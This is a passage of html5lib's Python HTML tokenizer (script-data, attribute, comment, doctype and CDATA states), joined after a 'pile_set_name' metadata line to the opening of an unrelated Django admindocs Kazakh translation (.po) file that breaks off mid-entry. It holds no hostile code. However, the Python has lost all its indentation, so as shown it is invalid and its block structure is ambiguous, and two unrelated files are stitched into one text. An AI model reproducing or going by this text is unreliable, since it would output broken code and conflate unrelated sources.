self.stream.unget(data)
self.state = self.scriptDataEscapedState
return True
def scriptDataDoubleEscapeStartState(self):
data = self.stream.char()
if data in (spaceCharacters | frozenset(("/", ">"))):
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
if self.temporaryBuffer.lower() == "script":
self.state = self.scriptDataDoubleEscapedState
else:
self.state = self.scriptDataEscapedState
elif data in asciiLetters:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
self.temporaryBuffer += data
else:
self.stream.unget(data)
self.state = self.scriptDataEscapedState
return True
def scriptDataDoubleEscapedState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
self.state = self.scriptDataDoubleEscapedDashState
elif data == "<":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.state = self.scriptDataDoubleEscapedLessThanSignState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
elif data == EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-script-in-script"})
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
return True
def scriptDataDoubleEscapedDashState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
self.state = self.scriptDataDoubleEscapedDashDashState
elif data == "<":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.state = self.scriptDataDoubleEscapedLessThanSignState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
self.state = self.scriptDataDoubleEscapedState
elif data == EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-script-in-script"})
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
self.state = self.scriptDataDoubleEscapedState
return True
def scriptDataDoubleEscapedDashDashState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
elif data == "<":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.state = self.scriptDataDoubleEscapedLessThanSignState
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": ">"})
self.state = self.scriptDataState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
self.state = self.scriptDataDoubleEscapedState
elif data == EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-script-in-script"})
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
self.state = self.scriptDataDoubleEscapedState
return True
def scriptDataDoubleEscapedLessThanSignState(self):
data = self.stream.char()
if data == "/":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "/"})
self.temporaryBuffer = ""
self.state = self.scriptDataDoubleEscapeEndState
else:
self.stream.unget(data)
self.state = self.scriptDataDoubleEscapedState
return True
def scriptDataDoubleEscapeEndState(self):
data = self.stream.char()
if data in (spaceCharacters | frozenset(("/", ">"))):
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
if self.temporaryBuffer.lower() == "script":
self.state = self.scriptDataEscapedState
else:
self.state = self.scriptDataDoubleEscapedState
elif data in asciiLetters:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
self.temporaryBuffer += data
else:
self.stream.unget(data)
self.state = self.scriptDataDoubleEscapedState
return True
def beforeAttributeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.stream.charsUntil(spaceCharacters, True)
elif data in asciiLetters:
self.currentToken["data"].append([data, ""])
self.state = self.attributeNameState
elif data == ">":
self.emitCurrentToken()
elif data == "/":
self.state = self.selfClosingStartTagState
elif data in ("'", '"', "=", "<"):
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"invalid-character-in-attribute-name"})
self.currentToken["data"].append([data, ""])
self.state = self.attributeNameState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"].append(["\uFFFD", ""])
self.state = self.attributeNameState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-attribute-name-but-got-eof"})
self.state = self.dataState
else:
self.currentToken["data"].append([data, ""])
self.state = self.attributeNameState
return True
def attributeNameState(self):
data = self.stream.char()
leavingThisState = True
emitToken = False
if data == "=":
self.state = self.beforeAttributeValueState
elif data in asciiLetters:
self.currentToken["data"][-1][0] += data +\
self.stream.charsUntil(asciiLetters, True)
leavingThisState = False
elif data == ">":
# XXX If we emit here the attributes are converted to a dict
# without being checked and when the code below runs we error
# because data is a dict not a list
emitToken = True
elif data in spaceCharacters:
self.state = self.afterAttributeNameState
elif data == "/":
self.state = self.selfClosingStartTagState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"][-1][0] += "\uFFFD"
leavingThisState = False
elif data in ("'", '"', "<"):
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data":
"invalid-character-in-attribute-name"})
self.currentToken["data"][-1][0] += data
leavingThisState = False
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "eof-in-attribute-name"})
self.state = self.dataState
else:
self.currentToken["data"][-1][0] += data
leavingThisState = False
if leavingThisState:
# Attributes are not dropped at this stage. That happens when the
# start tag token is emitted so values can still be safely appended
# to attributes, but we do want to report the parse error in time.
self.currentToken["data"][-1][0] = (
self.currentToken["data"][-1][0].translate(asciiUpper2Lower))
for name, _ in self.currentToken["data"][:-1]:
if self.currentToken["data"][-1][0] == name:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"duplicate-attribute"})
break
# XXX Fix for above XXX
if emitToken:
self.emitCurrentToken()
return True
def afterAttributeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.stream.charsUntil(spaceCharacters, True)
elif data == "=":
self.state = self.beforeAttributeValueState
elif data == ">":
self.emitCurrentToken()
elif data in asciiLetters:
self.currentToken["data"].append([data, ""])
self.state = self.attributeNameState
elif data == "/":
self.state = self.selfClosingStartTagState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"].append(["\uFFFD", ""])
self.state = self.attributeNameState
elif data in ("'", '"', "<"):
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"invalid-character-after-attribute-name"})
self.currentToken["data"].append([data, ""])
self.state = self.attributeNameState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-end-of-tag-but-got-eof"})
self.state = self.dataState
else:
self.currentToken["data"].append([data, ""])
self.state = self.attributeNameState
return True
def beforeAttributeValueState(self):
data = self.stream.char()
if data in spaceCharacters:
self.stream.charsUntil(spaceCharacters, True)
elif data == "\"":
self.state = self.attributeValueDoubleQuotedState
elif data == "&":
self.state = self.attributeValueUnQuotedState
self.stream.unget(data)
elif data == "'":
self.state = self.attributeValueSingleQuotedState
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-attribute-value-but-got-right-bracket"})
self.emitCurrentToken()
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"][-1][1] += "\uFFFD"
self.state = self.attributeValueUnQuotedState
elif data in ("=", "<", "`"):
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"equals-in-unquoted-attribute-value"})
self.currentToken["data"][-1][1] += data
self.state = self.attributeValueUnQuotedState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-attribute-value-but-got-eof"})
self.state = self.dataState
else:
self.currentToken["data"][-1][1] += data
self.state = self.attributeValueUnQuotedState
return True
def attributeValueDoubleQuotedState(self):
data = self.stream.char()
if data == "\"":
self.state = self.afterAttributeValueState
elif data == "&":
self.processEntityInAttribute('"')
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"][-1][1] += "\uFFFD"
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-attribute-value-double-quote"})
self.state = self.dataState
else:
self.currentToken["data"][-1][1] += data +\
self.stream.charsUntil(("\"", "&", "\u0000"))
return True
def attributeValueSingleQuotedState(self):
data = self.stream.char()
if data == "'":
self.state = self.afterAttributeValueState
elif data == "&":
self.processEntityInAttribute("'")
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"][-1][1] += "\uFFFD"
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-attribute-value-single-quote"})
self.state = self.dataState
else:
self.currentToken["data"][-1][1] += data +\
self.stream.charsUntil(("'", "&", "\u0000"))
return True
def attributeValueUnQuotedState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeAttributeNameState
elif data == "&":
self.processEntityInAttribute(">")
elif data == ">":
self.emitCurrentToken()
elif data in ('"', "'", "=", "<", "`"):
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-character-in-unquoted-attribute-value"})
self.currentToken["data"][-1][1] += data
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"][-1][1] += "\uFFFD"
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-attribute-value-no-quotes"})
self.state = self.dataState
else:
self.currentToken["data"][-1][1] += data + self.stream.charsUntil(
frozenset(("&", ">", '"', "'", "=", "<", "`", "\u0000")) | spaceCharacters)
return True
def afterAttributeValueState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeAttributeNameState
elif data == ">":
self.emitCurrentToken()
elif data == "/":
self.state = self.selfClosingStartTagState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-EOF-after-attribute-value"})
self.stream.unget(data)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-character-after-attribute-value"})
self.stream.unget(data)
self.state = self.beforeAttributeNameState
return True
def selfClosingStartTagState(self):
data = self.stream.char()
if data == ">":
self.currentToken["selfClosing"] = True
self.emitCurrentToken()
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data":
"unexpected-EOF-after-solidus-in-tag"})
self.stream.unget(data)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-character-after-solidus-in-tag"})
self.stream.unget(data)
self.state = self.beforeAttributeNameState
return True
def bogusCommentState(self):
# Make a new comment token and give it as value all the characters
# until the first > or EOF (charsUntil checks for EOF automatically)
# and emit it.
data = self.stream.charsUntil(">")
data = data.replace("\u0000", "\uFFFD")
self.tokenQueue.append(
{"type": tokenTypes["Comment"], "data": data})
# Eat the character directly after the bogus comment which is either a
# ">" or an EOF.
self.stream.char()
self.state = self.dataState
return True
def markupDeclarationOpenState(self):
charStack = [self.stream.char()]
if charStack[-1] == "-":
charStack.append(self.stream.char())
if charStack[-1] == "-":
self.currentToken = {"type": tokenTypes["Comment"], "data": ""}
self.state = self.commentStartState
return True
elif charStack[-1] in ('d', 'D'):
matched = True
for expected in (('o', 'O'), ('c', 'C'), ('t', 'T'),
('y', 'Y'), ('p', 'P'), ('e', 'E')):
charStack.append(self.stream.char())
if charStack[-1] not in expected:
matched = False
break
if matched:
self.currentToken = {"type": tokenTypes["Doctype"],
"name": "",
"publicId": None, "systemId": None,
"correct": True}
self.state = self.doctypeState
return True
elif (charStack[-1] == "[" and
self.parser is not None and
self.parser.tree.openElements and
self.parser.tree.openElements[-1].namespace != self.parser.tree.defaultNamespace):
matched = True
for expected in ["C", "D", "A", "T", "A", "["]:
charStack.append(self.stream.char())
if charStack[-1] != expected:
matched = False
break
if matched:
self.state = self.cdataSectionState
return True
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-dashes-or-doctype"})
while charStack:
self.stream.unget(charStack.pop())
self.state = self.bogusCommentState
return True
def commentStartState(self):
data = self.stream.char()
if data == "-":
self.state = self.commentStartDashState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"] += "\uFFFD"
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"incorrect-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["data"] += data
self.state = self.commentState
return True
def commentStartDashState(self):
data = self.stream.char()
if data == "-":
self.state = self.commentEndState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"] += "-\uFFFD"
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"incorrect-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["data"] += "-" + data
self.state = self.commentState
return True
def commentState(self):
data = self.stream.char()
if data == "-":
self.state = self.commentEndDashState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"] += "\uFFFD"
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "eof-in-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["data"] += data + \
self.stream.charsUntil(("-", "\u0000"))
return True
def commentEndDashState(self):
data = self.stream.char()
if data == "-":
self.state = self.commentEndState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"] += "-\uFFFD"
self.state = self.commentState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment-end-dash"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["data"] += "-" + data
self.state = self.commentState
return True
def commentEndState(self):
data = self.stream.char()
if data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"] += "--\uFFFD"
self.state = self.commentState
elif data == "!":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-bang-after-double-dash-in-comment"})
self.state = self.commentEndBangState
elif data == "-":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-dash-after-double-dash-in-comment"})
self.currentToken["data"] += data
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment-double-dash"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
# XXX
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-comment"})
self.currentToken["data"] += "--" + data
self.state = self.commentState
return True
def commentEndBangState(self):
data = self.stream.char()
if data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == "-":
self.currentToken["data"] += "--!"
self.state = self.commentEndDashState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"] += "--!\uFFFD"
self.state = self.commentState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment-end-bang-state"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["data"] += "--!" + data
self.state = self.commentState
return True
def doctypeState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeDoctypeNameState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-doctype-name-but-got-eof"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"need-space-after-doctype"})
self.stream.unget(data)
self.state = self.beforeDoctypeNameState
return True
def beforeDoctypeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-doctype-name-but-got-right-bracket"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["name"] = "\uFFFD"
self.state = self.doctypeNameState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-doctype-name-but-got-eof"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["name"] = data
self.state = self.doctypeNameState
return True
def doctypeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.currentToken["name"] = self.currentToken["name"].translate(asciiUpper2Lower)
self.state = self.afterDoctypeNameState
elif data == ">":
self.currentToken["name"] = self.currentToken["name"].translate(asciiUpper2Lower)
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["name"] += "\uFFFD"
self.state = self.doctypeNameState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype-name"})
self.currentToken["correct"] = False
self.currentToken["name"] = self.currentToken["name"].translate(asciiUpper2Lower)
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["name"] += data
return True
def afterDoctypeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.currentToken["correct"] = False
self.stream.unget(data)
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
if data in ("p", "P"):
matched = True
for expected in (("u", "U"), ("b", "B"), ("l", "L"),
("i", "I"), ("c", "C")):
data = self.stream.char()
if data not in expected:
matched = False
break
if matched:
self.state = self.afterDoctypePublicKeywordState
return True
elif data in ("s", "S"):
matched = True
for expected in (("y", "Y"), ("s", "S"), ("t", "T"),
("e", "E"), ("m", "M")):
data = self.stream.char()
if data not in expected:
matched = False
break
if matched:
self.state = self.afterDoctypeSystemKeywordState
return True
# All the characters read before the current 'data' will be
# [a-zA-Z], so they're garbage in the bogus doctype and can be
# discarded; only the latest character might be '>' or EOF
# and needs to be ungetted
self.stream.unget(data)
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-space-or-right-bracket-in-doctype", "datavars":
{"data": data}})
self.currentToken["correct"] = False
self.state = self.bogusDoctypeState
return True
def afterDoctypePublicKeywordState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeDoctypePublicIdentifierState
elif data in ("'", '"'):
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.stream.unget(data)
self.state = self.beforeDoctypePublicIdentifierState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.stream.unget(data)
self.state = self.beforeDoctypePublicIdentifierState
return True
def beforeDoctypePublicIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == "\"":
self.currentToken["publicId"] = ""
self.state = self.doctypePublicIdentifierDoubleQuotedState
elif data == "'":
self.currentToken["publicId"] = ""
self.state = self.doctypePublicIdentifierSingleQuotedState
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-end-of-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["correct"] = False
self.state = self.bogusDoctypeState
return True
def doctypePublicIdentifierDoubleQuotedState(self):
data = self.stream.char()
if data == "\"":
self.state = self.afterDoctypePublicIdentifierState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["publicId"] += "\uFFFD"
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-end-of-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["publicId"] += data
return True
def doctypePublicIdentifierSingleQuotedState(self):
data = self.stream.char()
if data == "'":
self.state = self.afterDoctypePublicIdentifierState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["publicId"] += "\uFFFD"
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-end-of-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["publicId"] += data
return True
def afterDoctypePublicIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.betweenDoctypePublicAndSystemIdentifiersState
elif data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == '"':
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["systemId"] = ""
self.state = self.doctypeSystemIdentifierDoubleQuotedState
elif data == "'":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["systemId"] = ""
self.state = self.doctypeSystemIdentifierSingleQuotedState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["correct"] = False
self.state = self.bogusDoctypeState
return True
def betweenDoctypePublicAndSystemIdentifiersState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == '"':
self.currentToken["systemId"] = ""
self.state = self.doctypeSystemIdentifierDoubleQuotedState
elif data == "'":
self.currentToken["systemId"] = ""
self.state = self.doctypeSystemIdentifierSingleQuotedState
elif data == EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["correct"] = False
self.state = self.bogusDoctypeState
return True
def afterDoctypeSystemKeywordState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeDoctypeSystemIdentifierState
elif data in ("'", '"'):
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.stream.unget(data)
self.state = self.beforeDoctypeSystemIdentifierState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.stream.unget(data)
self.state = self.beforeDoctypeSystemIdentifierState
return True
def beforeDoctypeSystemIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == "\"":
self.currentToken["systemId"] = ""
self.state = self.doctypeSystemIdentifierDoubleQuotedState
elif data == "'":
self.currentToken["systemId"] = ""
self.state = self.doctypeSystemIdentifierSingleQuotedState
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["correct"] = False
self.state = self.bogusDoctypeState
return True
def doctypeSystemIdentifierDoubleQuotedState(self):
data = self.stream.char()
if data == "\"":
self.state = self.afterDoctypeSystemIdentifierState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["systemId"] += "\uFFFD"
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-end-of-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["systemId"] += data
return True
def doctypeSystemIdentifierSingleQuotedState(self):
data = self.stream.char()
if data == "'":
self.state = self.afterDoctypeSystemIdentifierState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["systemId"] += "\uFFFD"
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-end-of-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["systemId"] += data
return True
def afterDoctypeSystemIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.state = self.bogusDoctypeState
return True
def bogusDoctypeState(self):
data = self.stream.char()
if data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
# XXX EMIT
self.stream.unget(data)
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
pass
return True
def cdataSectionState(self):
data = []
while True:
data.append(self.stream.charsUntil("]"))
data.append(self.stream.charsUntil(">"))
char = self.stream.char()
if char == EOF:
break
else:
assert char == ">"
if data[-1][-2:] == "]]":
data[-1] = data[-1][:-2]
break
else:
data.append(char)
data = "".join(data) # pylint:disable=redefined-variable-type
# Deal with null here rather than in the parser
nullCount = data.count("\u0000")
if nullCount > 0:
for _ in range(nullCount):
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
data = data.replace("\u0000", "\uFFFD")
if data:
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": data})
self.state = self.dataState
return True
| {
"pile_set_name": "Github"
} |
# This file is distributed under the same license as the Django package.
#
# Translators:
# Nurlan Rakhimzhanov <[email protected]>, 2011
# yun_man_ger <[email protected]>, 2011
msgid ""
msgstr ""
"Project-Id-Version: django\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2017-01-19 16:49+0100\n"
"PO-Revision-Date: 2017-09-19 16:40+0000\n"
"Last-Translator: Jannis Leidel <[email protected]>\n"
"Language-Team: Kazakh (http://www.transifex.com/django/django/language/kk/)\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"Language: kk\n"
"Plural-Forms: nplurals=2; plural=(n!=1);\n"
msgid "Administrative Documentation"
msgstr ""
msgid "Home"
msgstr "Негізгі"
msgid "Documentation"
msgstr "Документация"
msgid "Bookmarklets"
msgstr "Букмарклеттер"
msgid "Documentation bookmarklets"
msgstr "Құжаттама букмарклеттері"
msgid ""
"To install bookmarklets, drag the link to your bookmarks toolbar, or right-"
"click the link and add it to your bookmarks. Now you can select the "
"bookmarklet from any page in the site."
msgstr ""
msgid "Documentation for this page"
msgstr "Бұл бетке арналған документация"
msgid ""
"Jumps you from any page to the documentation for the view that generates "
"that page."
msgstr ""
msgid "Tags"
msgstr ""
msgid "List of all the template tags and their functions."
msgstr ""
msgid "Filters"
msgstr ""
msgid ""
"Filters are actions which can be applied to variables in a template to alter "
"the output."
msgstr ""
msgid "Models"
msgstr ""
msgid ""
"Models are descriptions of all the objects in the system and their "
"associated fields. Each model has a list of fields which can be accessed as "
"template variables"
msgstr ""
msgid "Views"
msgstr ""
msgid ""
"Each page on the public site is generated by a view. The view defines which "
